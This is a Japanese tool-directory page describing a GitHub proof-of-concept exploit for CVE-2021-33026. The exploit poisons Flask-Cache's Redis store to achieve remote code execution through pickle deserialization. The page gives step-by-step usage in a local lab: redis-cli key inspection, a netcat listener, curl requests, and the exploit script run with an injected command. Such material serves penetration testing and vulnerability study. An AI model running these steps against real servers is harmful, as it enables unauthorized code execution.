Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
FlaskCache_CVE-2021-33026_POC — CVE-2021-33026のPoCエクスプロイト。Flask-CacheのRedisキャッシュを汚染し、悪意のあるpickle逆シリアライゼーションを介してリモートコード実行を達成します。 | Kitploit
ツール/GitHubGitHub/agilevatester/flaskcache_cve-2021-33026_poc
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングリモートアクセスツール
GitHubagilevatester/flaskcache_cve-2021-33026_poc

FlaskCache_CVE-2021-33026_POC

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-33026のPoCエクスプロイト。Flask-CacheのRedisキャッシュを汚染し、悪意のあるpickle逆シリアライゼーションを介してリモートコード実行を達成します。

リポジトリを見る
128ヶ月前未レビュー

Pickleシリアライゼーションのリモートコード実行 - Redis Poisoning PoCエクスプロイト


Redisサーバーが起動しているか確認

redis-cli -h 127.0.0.1 -p 6379 ping

redis-cli keys *

redis-cli get [Keyid]


ポート10001でnetcatのリスニングを開始:

nc -nvlp 10001


Flask Chache の環境を設定する

python -m venv venv_flask_cache_<lib_ver>

source venv_flask_cache_<lib_ver>\scripts\activate

pip install -r <requirement.txt>

Flask Chache 2.3.0 の環境を設定する

Flask Appを実行し、キャッシュキーを作成:

flask run

curl --header "Content-Type: application/json" --request POST --data {"key":"Cachelib_2.3"} http://localhost:5000/cache/new

Flask Appからキャッシュキーの値を取得

curl --request GET http://localhost:5000/cache/[key]

RedisキャッシュをポイズニングしてFlask Cacheを悪用:

cve-2021-33026_PoC.py --rhost 127.0.0.1 --rport 5000 --cacheType redis --cmd "curl http://localhost:10001" --id 41685a90-434e-4d70-9a08-35b78025e09a

ツールをダウンロード